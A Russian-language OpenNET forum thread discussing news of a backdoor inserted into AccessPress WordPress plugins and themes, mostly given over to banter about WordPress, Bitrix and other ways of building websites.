The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Бэкдор в 93 плагинах и темах оформления AccessPress, применяемых на 360 тысячах сайтов"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Бэкдор в 93 плагинах и темах оформления AccessPress, применяемых на 360 тысячах сайтов"  +/
Сообщение от opennews (??), 22-Янв-22, 13:48 
Злоумышленникам удалось встроить бэкдор в 40 плагинов и 53 темы оформления для системы управления контентом WordPress, разрабатываемых компанией AccessPress, которая заявляет, что её дополнения используются на более чем 360 тысячах сайтов. Результаты разбора инцидента пока не приводятся, но предполагается, что вредоносный код удалось внедрить в ходе компрометации сайта AccessPress, внеся изменения предлагаемые для загрузки архивы с уже выпущенными релизами, так как бэкдор присутствует только в коде, распространяемом через официальный сайт AccessPress, но отсутствует в тех же выпусках дополнений, распространяемых через каталог WordPress.org...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=56560

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +8 +/
Сообщение от Аноним (1), 22-Янв-22, 13:48 
храните ваши деньги в сберегательной кассе ©
Ответить | Правка | Наверх | Cообщить модератору

9. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (9), 22-Янв-22, 14:21 
Пишите сайты на Wt.
Ответить | Правка | Наверх | Cообщить модератору

10. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от topin89 (ok), 22-Янв-22, 14:31 
Тогда на асме сразу, чего мелочиться. https://asm32.info/fossil/asmbb/index
Ответить | Правка | Наверх | Cообщить модератору

18. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Аноним (-), 22-Янв-22, 15:28 
флат только для 86х . т.е ненужен
Ответить | Правка | Наверх | Cообщить модератору

42. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (9), 22-Янв-22, 17:57 
https://www.webtoolkit.eu/wt/download
Ответить | Правка | Наверх | Cообщить модератору

71. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –3 +/
Сообщение от Аноним (-), 22-Янв-22, 21:16 
тормознутое c++ сами жрите
Ответить | Правка | Наверх | Cообщить модератору

61. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от oliliputiputiputi (?), 22-Янв-22, 19:30 
x86_64 тоже не нужен
Ответить | Правка | К родителю #18 | Наверх | Cообщить модератору

44. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Аноним (9), 22-Янв-22, 17:59 
С поддерживает ассемблерные вставки. Если для проекта формализируете, как работать с регистрами и прочим, почему бы и нет.
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

72. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (-), 22-Янв-22, 21:18 
и куда ты их вставлять собрался ? вот конкретно, хттп сервер отдающей файл в линуксе с неизвестной фс на неизвестную карту на неизвестной платформе. расскажи мне и я повставляю
Ответить | Правка | Наверх | Cообщить модератору

123. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (9), 23-Янв-22, 16:16 
Тебе topin89 предложил это. Ты у него спроси конкретно. А когда он тебе расскажет, ты сможешь вставить их на сайт, который ты пишешь.

Да, ты не в теме - Wt к HPH отношения не имеет. Ты должен изучить тему прежде, чем ты будешь выражать мнение.

Ответить | Правка | Наверх | Cообщить модератору

125. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от anonymous (??), 24-Янв-22, 00:11 
Крупная компания, которая держит гомогенный парк серверов и начинки в них. Ты доволен? Сначала написать на Си, потом раздебажить, оптимизировать вручную. А затем и переписать с нуля на ассемблере. Типа нереально?
Ответить | Правка | К родителю #72 | Наверх | Cообщить модератору

132. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Ordu (ok), 24-Янв-22, 07:52 
Типа нереально. При попытке сделать так возникает куча проблем организационного и экономического толка. Например, привязка к этой гомогенности. Пройдёт лет пять, и железо потребуется обновлять или расширять, но в случае заточенного под конкретную железку кода, вариант со сменой железа станет гораздо дороже. То есть, сильно затачиваясь на что-то, мы приносим в жертву будущую гибкость принятия решений. Стоит ли оно того?

А тут мы подходим к проблеме бюрократии и разделения ответственности за принятие решений. Это в принципе большая и сложная организационная проблема: часто при принятии решения основные риски берёт на себя не тот, кто квалифицирован в достаточной мере, чтобы принимать такое решение. Например, рискующим больше всех может быть инвестор. А достаточно квалифицированным может быть менеджер среднего звена. И как? На этого менагера невозможно свалить финансовые риски, связанные с решением. А попытка вынудить инвестора принять риски будет связана с тем, что инвестор должен будет _поверить_ специалистам, что риск стоит того. А если решение окажется неудачным? Доверию придёт конец. CEO уволят, а может не только его. Кому это надо?

Или другая проблема: кто будет оптимизировать так код? Крутой спец, этт понятно, но каким будет его положение в организации? Рядовой девелопер? Чем он будет заниматься после окончания деятельности по созданию такой оптимизированной реализации? Если мы не найдём ему полезной (aka приносящей денег) деятельности, то он будет висеть на организации мёртвым грузом: зарплату получает, денег не приносит. Если же мы его уволим, то что будем делать в случае проблем с его кодом?

В каких-то специальных случаях может быть выгодно так оптимизировать. В криптомайнинге, например. Но во многих-многих других проще (и дешевле, и надёжнее) купить больше железа.

> Типа нереально?

Хорошей эвристикой реальности или нереальности какого-то замысла являются примеры успешной реализации этого замысла. Настолько хорошей, что когда какой-то замысел кажется удачным, но ты не видишь примеров его реализации, то дефолтным выводом твоим должен быть вывод о нереальности замысла. Дефолтным -- это в том смысле, что другой вывод возможен только после того, как ты нашёл объяснение наблюдаемому отсутствию реализаций замысла.

Ответить | Правка | Наверх | Cообщить модератору

11. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Кир (?), 22-Янв-22, 14:33 
Два чая этому господину!
Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

33. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от Аноним (33), 22-Янв-22, 17:34 
ВордТрест?
Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

45. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (9), 22-Янв-22, 17:59 
Вообще-то Витти.
Ответить | Правка | Наверх | Cообщить модератору

60. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от дохтурЛол (?), 22-Янв-22, 19:29 
Вивитти (надо выйти / на репите) тогда уж.
Ответить | Правка | Наверх | Cообщить модератору

76. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +3 +/
Сообщение от Аноним (76), 22-Янв-22, 21:56 
храните ваши деньги в нашей сберегательной кассе
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

82. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –4 +/
Сообщение от Дегенератор (ok), 22-Янв-22, 22:59 
Сайты нужно писать на Расте.
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

91. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от Аноним (91), 23-Янв-22, 00:31 
Тогда никакой памяти не хватит из-за безопасной утечки.
Ответить | Правка | Наверх | Cообщить модератору

2. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Kusb (?), 22-Янв-22, 13:49 
С одной строны бекдор в темах это странно.
С другой - вид и поведение связаны и если в тему можно сунуть бекдор - система гибкая.
В третьих - это же веб...
Ответить | Правка | Наверх | Cообщить модератору

4. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –12 +/
Сообщение от DIO (?), 22-Янв-22, 13:56 
и что что веб? или по вашей методичке веб - это криво? напомню, что вы как раз на вебе выср;%и каммент и когда хеловордите то пользуетесь вебом чтобы найти очередной свой хеловорд.
есть большое количество систем управления которые не страдают таким маразмом как вп но миллиарды мух не могут же ж ошЫбатся...

п.с. кстати интырпрайз еще сильно дырявее чем веб т.к. там в 90% случаев все "секурити" оставляют на растерзание нетворадминам, которые плавно превращаются в девопсов, тестеров и исправлятелей

Ответить | Правка | Наверх | Cообщить модератору

6. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –5 +/
Сообщение от Аноним (6), 22-Янв-22, 14:01 
Так может например какой-нибудь Гугл сделает правильную CMS для всех. Ой так им же это не выгодно им выгодно поддерживать УГ, вместо которых давать свои проприетарные ресурсы как сервис.  Которые конкретно Гугл еще и закрывает постоянно.  
Ответить | Правка | Наверх | Cообщить модератору

79. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от YetAnotherOnanym (ok), 22-Янв-22, 22:20 
Правильная CMS наверняка уже существует. Просто не все ещё её для себя нашли. Но попытаться стОит.
Начните вот с этого списка, для начала: https://en.wikipedia.org/wiki/List_of_content_management_sys...
Ответить | Правка | Наверх | Cообщить модератору

140. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от lockywolf (ok), 24-Янв-22, 13:14 
Уже есть самая правильная CMS на свете -- Битрикс.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

39. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +5 +/
Сообщение от Аноньимъ (ok), 22-Янв-22, 17:51 
Таблетки пить не забывайте пожалуйста.
Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору

49. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от User (??), 22-Янв-22, 18:43 
Ну, в общем да. Имманентно присущее свойство. Слишком много уровней абстракции, слишком широко распространение слишком... Да всё слишком.
Криво, косо, уродливо, частичнополомано ну вот просто ВСЕГДА.
Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору

51. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от keydon (ok), 22-Янв-22, 18:51 
Да, веб и криво это синонимы, где-то с середины 2000х (а то и раньше). Профэссор, я работаю без методичек.
> напомню, что вы как раз на вебе выср;%и каммент и когда хеловордите то пользуетесь вебом чтобы найти очередной свой хеловорд.

И что это меняет?
> кстати интырпрайз еще сильно дырявее чем веб т.к. там в 90% случаев все "секурити" оставляют на растерзание нетворадминам, которые плавно превращаются в девопсов, тестеров и исправлятелей

Фактически интырпрайз и есть веб, где-то больше, где-то меньше.

Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору

5. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от Аноним (6), 22-Янв-22, 13:58 
То что система гибкая это не её плюс. То что в вордпрессе плагины и даже их версии часто прибиты гвоздями к версии не плюс. И то что темы и версии плагинов никто конечно же не обновляет после того как сдали например заказчик это факт.  

Вывод: Вордпресс — УГ.

Ответить | Правка | К родителю #2 | Наверх | Cообщить модератору

12. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –4 +/
Сообщение от Аноним (12), 22-Янв-22, 14:44 
> Вывод: Вордпресс — УГ.

Критикуешь неправильное -- рекомендуй правильное.
Поэтому список CMS давай, которые труъ.
Ждём.

Ответить | Правка | Наверх | Cообщить модератору

22. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от haha (??), 22-Янв-22, 16:13 
Таких нет. Вся вэбня это шлак и помои. Без исключений.
Ответить | Правка | Наверх | Cообщить модератору

23. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +4 +/
Сообщение от Аноним (23), 22-Янв-22, 16:17 
Любой генератор статики к твоим услугам.  Например https://gohugo.io/
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

78. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от anonymous (??), 22-Янв-22, 22:00 
wp можно переводить в статику - итого имеет доступ к богатой экосистеме плагинов и тем без необходимости клепать велосипеды на очередном генераторе статики

curl -I http://megalanding.wordpress.site/ > index.html

Ответить | Правка | Наверх | Cообщить модератору

115. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (23), 23-Янв-22, 12:55 
Вот и имеем 360 000 затрояненных сайтов. Зато богатая экосистема плагинов, а не помойка. Вы обязательно продолжайте ваше мнение очень важно для нас.  
Ответить | Правка | Наверх | Cообщить модератору

30. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Vacu923ek (ok), 22-Янв-22, 16:33 
Дурачкам вроде тебя не приходила мысль, что из всех существующих CMS вообще НИ ОДНА может не быть хорошей?!
Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

35. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (35), 22-Янв-22, 17:39 
Какое решение на замену CMS вы бы назвали хорошим?
Ответить | Правка | Наверх | Cообщить модератору

36. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от Michael Shigorinemail (ok), 22-Янв-22, 17:48 
Некоторые считают, что альтернатива -- утки! :)

PS: жертв wordpress, конечно, жаль каждый раз, но и предупреждали их тысячекратно; а здесь слово "access" содержится прям в названии лавочки, столь удобно его предоставившей.

Ответить | Правка | Наверх | Cообщить модератору

43. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноньимъ (ok), 22-Янв-22, 17:57 
Можно просто взять и отверстать сайт?
Работы буквально столько же если не меньше чем с вордпрессом.

Если нужна динамика то бекенд прикручиваешь хоть на томже жаваскрипте.

И есть же всякие, прости господи, реакты, для тех кто неосилил штмл.

Ответить | Правка | К родителю #35 | Наверх | Cообщить модератору

128. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от мое правило (?), 24-Янв-22, 01:59 
Сейчас верстая по современному вы стянете половину npm. А там такая же дырень как и вордпрес.
Ответить | Правка | Наверх | Cообщить модератору

77. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от Vacu923ek (ok), 22-Янв-22, 21:57 
> Какое решение на замену CMS вы бы назвали хорошим?

Любое самописное. Звучит смешно, но именно свой проф.движок может 100% отвечать вашим запросам - безопасность, простота, скорость, дизайн, *правильный ЯП* и т.п. И конечно же, быть СОПРОВОЖДАЕМЫМ - ключевое свойство долгосрочных проектов.

Ответить | Правка | К родителю #35 | Наверх | Cообщить модератору

83. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от угу (?), 22-Янв-22, 23:13 
Звучит не смешно а печально. Опеннет скатился...

Один всерьез думает что реакт это "замена html", другой каждый день пишет "свой проф.движок", вероятно, на деньги из тумбочки...

Сколько гуглей уже написал-то?

Ответить | Правка | Наверх | Cообщить модератору

116. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от Аноним (23), 23-Янв-22, 12:56 
Сколько троянов в своём вордпрессе уже нашел? Ой так ты их и не искал, ты троянов специально разводишь как тараканов.  
Ответить | Правка | Наверх | Cообщить модератору

87. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от suffix (ok), 23-Янв-22, 00:03 
Битрикс разумеется !
Ответить | Правка | К родителю #35 | Наверх | Cообщить модератору

88. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Аноним (12), 23-Янв-22, 00:18 
> Битрикс разумеется !

Пойдите на nic.ru, там есть бесплатный месячный пробный тариф с битриксом (ссылка доступна через FAQ про тарифы CMS-хостингов, тогда как в числе тарфов битрикса пробный почему-то отсутствует).
Зарегистрируйтесь, купите бесплатный тариф (он у них требует оплату в 1р вроде бы), установите на хостинг CMS (для этого там есть кнопка "установить CMS"), затем зайдите туда по ftp и ознакомьтесь со скриптами.

Маленькие base64 в сабже вам покажутся детским лепетом по сравнению с обфусцированным php-кодом 1C.

Также не думаю, что вы сможете как-то оценить безопасность подобной абракадабры.

Ответить | Правка | Наверх | Cообщить модератору

89. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –4 +/
Сообщение от suffix (ok), 23-Янв-22, 00:27 
Любезный, у меня самого сайт на Битрикс уже как 10 лет, если не больше.

В Битрикс есть встроенный модуль "Проактивная защита" - если в нём выставить всё на максимум то от кулхацкеров-школьников он гарантировано защитит.

P.S.

Я объективен - ибо сам этим модулем не пользуюсь - так как обладаю знаниями и умениями как самому всё обезопасить. Кроме того этот модуль привносит некоторую тормознутость, но для новичков - он самое оно !

Ответить | Правка | Наверх | Cообщить модератору

93. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Аноним (12), 23-Янв-22, 00:36 
> Любезный, у меня самого сайт на Битрикс уже как 10 лет, если не больше.

Нет у вас сайта на битриксе.
Вы вбили в яндекс запрос "битрикс защита", прочитали два первых пункта выдачи и написали с них коммент.
Это явное палево.

Ответить | Правка | Наверх | Cообщить модератору

95. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от suffix (ok), 23-Янв-22, 00:50 
Даже по нику моему ткнуть лень было :) ?

Или поиском по комментариям моим что здесь на опеннете, что на лоре, что на сёрче пробежаться (ник у меня везде одинаковый) ?

Я не шифруюсь ни разу !

Детский сад право - зачем мне в такой мелочи что-то придумывать ?

Ответить | Правка | Наверх | Cообщить модератору

117. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (23), 23-Янв-22, 12:59 
Проактивная защита, Проактивная, Карл!  После таких комментариев вера в пыхеров полностью исчезает.  Зачем вообще она нужна в чем-то безопасном.

Это я уже не говорю что заявления: «Я удалил антивирус, поэтому у меня нет вирусов» это пять я считаю. Продолжайте в том же духе.  

Ответить | Правка | К родителю #89 | Наверх | Cообщить модератору

120. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от suffix (ok), 23-Янв-22, 13:08 
1.

Не я так модуль назвал так что не по адресу :)

2.

Я не использую этот модуль так как использую modsecurity и антивирус мне не нужен так как сайт на выделенном сервере (не vps), других юзеров на сервере кроме меня нет, пользовательского контента нет, никто ничего загрузить не может.

Так что уважаемый Карл поумерьте свой пыл :)

Ответить | Правка | Наверх | Cообщить модератору

138. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (138), 24-Янв-22, 11:28 
Это тот кусок протухшего кода, который создает php файлик при создании пользователем страницы, да и вообще весь движок должен лежать кишками наружу, с сотнями тысяч точек входа и все это доступно на запись, где большая часть кода не документирована, где нет консольных инструментов для проверки целостности и переустановки, где все спроектировано так, чтобы конечное приложение нельзя было автоматически разворачивать и тестировать?
Ответить | Правка | К родителю #87 | Наверх | Cообщить модератору

139. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от suffix (ok), 24-Янв-22, 11:34 
Вы просто не умеете его готовить :)

Разумеется для сайта визитки Битрикс избыточен, разумеется для крупного кластерного решения Битрикс тоже не подходит, но для "среднего" звена по соотношению цена/качество Битрикс очень даже неплох (несмотря на огромное количество недостатков).


Ответить | Правка | Наверх | Cообщить модератору

143. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (138), 24-Янв-22, 13:44 
> Вы просто не умеете его готовить :)

Не умею и людей умеющих в природе не встречал, хотя многие до сих пор пытаются, у некоторых даже получается сделать так чтобы от первого взгляда не тянуло блевать от кода.

> Разумеется для сайта визитки Битрикс избыточен, разумеется для крупного кластерного решения
> Битрикс тоже не подходит, но для "среднего" звена по соотношению цена/качество
> Битрикс очень даже неплох (несмотря на огромное количество недостатков).

Видел не мало крупных проектов на этом продукте, даже без кластера, на одном толстом сервере, это превращается в неподдерживаемое нечто. Из плюсов там разве что готовые интеграции, которые чаще всего не работают из коробки, и готовые решения, которые тоже чаще не работают как надо.


Ответить | Правка | Наверх | Cообщить модератору

146. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от suffix (ok), 24-Янв-22, 14:18 
> которые чаще всего не работают из коробки

То что нужна после сборки обработка напильником это наша общенациональная фича а не недостаток Битрикса :)

Ответить | Правка | Наверх | Cообщить модератору

150. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (138), 25-Янв-22, 11:55 
Выпускать сырые продукты - это наша общенациональная бага, а не фитча, текущий битрикс, без полной документации апи - еще один пример сырого продукта, где кроме маркетологов никто не работает.
Ответить | Правка | Наверх | Cообщить модератору

151. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от suffix (ok), 25-Янв-22, 12:00 
А вот сейчас соглашусь с Вами.

Я вот в их модуле "Блоги" нашёл баг который вообще не позволяет модулем пользоваться - 4 раз уже в ТП обращался - баг подтверждают, но уже ГОД не чинят - пишут что неприоритетная задача :(

Ответить | Правка | Наверх | Cообщить модератору

101. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Аноним (91), 23-Янв-22, 01:06 
> Критикуешь неправильное -- рекомендуй правильное.

Дурачок, а при создании тикета на баг тоже надо сразу предлагать решение?

Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

106. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от IRASoldier_registered (ok), 23-Янв-22, 01:50 
Ну да. Пихают нанятые "веб-разработчики", научившиеся в шарашках "фулл-стек за три месяца! только сегодня скидка 60% на весь курс!" всякий шлак в сайт заказчика - но УГ именно Вордпресс, как же иначе-то.

Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

113. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от Аноним (113), 23-Янв-22, 08:44 
Почему в той же джанге нет таких проблем, хотя их клепают точно такие же курсовики? Да потому что вордпресс — дерьмo мамонта.  
Ответить | Правка | Наверх | Cообщить модератору

133. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от IRASoldier_registered (ok), 24-Янв-22, 09:22 
> потому что вордпресс — дерьмo мамонта

Ты из гибернации давно вышел? Поинтересуйся, когда вышла свежая версия вордпресса.

Ответить | Правка | Наверх | Cообщить модератору

131. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноньимъ (ok), 24-Янв-22, 06:07 
Разве не именно для этого и существует вордпресс?
Ответить | Правка | К родителю #106 | Наверх | Cообщить модератору

134. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –2 +/
Сообщение от IRASoldier_registered (ok), 24-Янв-22, 09:23 
Вордпресс существует для того, чтобы делать на нем сайты, подсказывает Кэп.


Ответить | Правка | Наверх | Cообщить модератору

142. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (142), 24-Янв-22, 13:29 
Вордпресс существует для того, чтобы дегенераты тоже могли делать сайты. я тебя немного поправил, маняКэп, не благодари.
Ответить | Правка | Наверх | Cообщить модератору

153. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от IRASoldier_registered (ok), 01-Фев-22, 09:03 
Иди и ещё понаслаждайся ощущением своей невклепенной элитарности. Тем временем кто-то где-то заливает на хостинг ещё один сайт на Вордпрессе и забавно то, что ты с этим ничего поделать не можешь :-) Более того, когда ты это будешь читать - за это время будет залито еще несколько сайтов на Вордпрессе. И тем, кто это делает, совершенно до болта, что какой-то русскоязычный аноним считает их дегенератом. Более того, они об этом даже не узнают. Прочувствуй это. (И вот когда ты это уже дочитал - количество сайтов на Вордпрессе в Интернете опять прибавилось, однако.)

Ответить | Правка | Наверх | Cообщить модератору

3. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +8 +/
Сообщение от AccessPress (?), 22-Янв-22, 13:55 
Не прокатило...
:-(

Ответить | Правка | Наверх | Cообщить модератору

40. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (40), 22-Янв-22, 17:53 
...  более чем 360 тысячах сайтов
Ответить | Правка | Наверх | Cообщить модератору

84. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от угу (?), 22-Янв-22, 23:14 
Но всего на три месяца :-(

А ведь щастье было так возможно...

Ответить | Правка | Наверх | Cообщить модератору

118. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (23), 23-Янв-22, 13:00 
Конечно же это последние вирусы в плагинах и уязвимости в вордпрессе. Теперь заживём. Ор выше гор.  
Ответить | Правка | Наверх | Cообщить модератору

7. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Atterratio (ok), 22-Янв-22, 14:03 
>закамуфлировано в виде блока данных в кодировке base64

Одно время работал в саппорте одного сервиса на котором часто хостили WP, и толковой проверки на вирусню там тогда не было, но часто банили за подозрительную активность. По инструкции мы должны в файлах такого клинта искать файлы с base64 кидать в вирус тотал и говорить у вас вирусня вот проверка. Так что что можно тут закамуфлировать)

Ответить | Правка | Наверх | Cообщить модератору

21. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +7 +/
Сообщение от john_erohin (?), 22-Янв-22, 15:52 
> искать файлы с base64 кидать в вирус тотал

вирустотал лишний этап.
потроха в base64 или еще какая обфускация - сразу нахер с пляжа.
и в политике хостинга это прописать.

ps: даешь вирусный опенсорц !

Ответить | Правка | Наверх | Cообщить модератору

55. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от sdafaytesyaswabrostionspolizey (?), 22-Янв-22, 19:11 
ты так сразу все торрент трекеры закроешь, почти все антивирусы и все программы с ключами. Всё обфускация.
без лицензии выдаваемой полицией ни одного сайта не создашь. ни одного хостинга кроме полицейского не останется.
Ответить | Правка | Наверх | Cообщить модератору

66. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от оберполицмейстер (?), 22-Янв-22, 20:15 
И что вы тут видите неправильным?
(Все сказанное или подуманное вами будет использовано против вас. Так что думайте аккуратнее.)

Ответить | Правка | Наверх | Cообщить модератору

70. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от john_erohin (?), 22-Янв-22, 21:09 
детский сад. внтури своих виртуальных машин делайте что хотите,
любой зоопарк, только платите за потребленные ресурсы и трафик.
Ответить | Правка | К родителю #55 | Наверх | Cообщить модератору

80. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от YetAnotherOnanym (ok), 22-Янв-22, 22:23 
> обфускация - сразу нахер с пляжа

Дай я тебя обниму и расцелую!

Ответить | Правка | К родителю #21 | Наверх | Cообщить модератору

26. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (23), 22-Янв-22, 16:21 
И все равно там дыра на дыре. Хостингам с этого плюс на бабки ставить пользователей.  
Ответить | Правка | К родителю #7 | Наверх | Cообщить модератору

8. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (8), 22-Янв-22, 14:15 
Не фартануло не повезло
Ответить | Правка | Наверх | Cообщить модератору

13. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –4 +/
Сообщение от жорик (?), 22-Янв-22, 14:54 
ох уже этот дырявый веб, больше джавы несите джаву *слюни
Ответить | Правка | Наверх | Cообщить модератору

37. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +4 +/
Сообщение от Michael Shigorinemail (ok), 22-Янв-22, 17:49 
При чём _тут_ java?
Ответить | Правка | Наверх | Cообщить модератору

53. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Аноним (40), 22-Янв-22, 18:57 
Там у товарища биполярное мышление PHP vs JAVA
Ответить | Правка | Наверх | Cообщить модератору

81. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от YetAnotherOnanym (ok), 22-Янв-22, 22:24 
Лютого косплеит.
Ответить | Правка | К родителю #37 | Наверх | Cообщить модератору

154. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (154), 05-Фев-22, 20:56 
Возможно тут не java, а дырявый javascript
Ответить | Правка | К родителю #37 | Наверх | Cообщить модератору

14. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +4 +/
Сообщение от псевдонимус (?), 22-Янв-22, 14:55 
Вечно с этим вордпрессом не слава богу.
Ответить | Правка | Наверх | Cообщить модератору

15. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +/
Сообщение от Аноним (12), 22-Янв-22, 15:16 
AccessPress -- это не WordPress.
Специалист из WordPress как раз-то и обнаружил этот бэкдор.
Везде б таких специалистов.
Ответить | Правка | Наверх | Cообщить модератору

38. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +1 +/
Сообщение от Michael Shigorinemail (ok), 22-Янв-22, 17:50 
> Специалист из WordPress как раз-то и обнаружил этот бэкдор.

Читать умеете?

> Везде б таких специалистов.

Достаточно не прогуливать уроки, в том числе тупя в тель-афон.

Ответить | Правка | Наверх | Cообщить модератору

74. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  +2 +/
Сообщение от Kusb (?), 22-Янв-22, 21:28 
И тель-авизор?
Ответить | Правка | Наверх | Cообщить модератору

92. "Бэкдор в 93 плагинах и темах оформления AccessPress, применя..."  –1 +/
Сообщение от Аноним (12), 23-Янв-22, 00:33 
> Читать умеете?

Во втором абзаце написано.

> > Везде б таких специалистов.
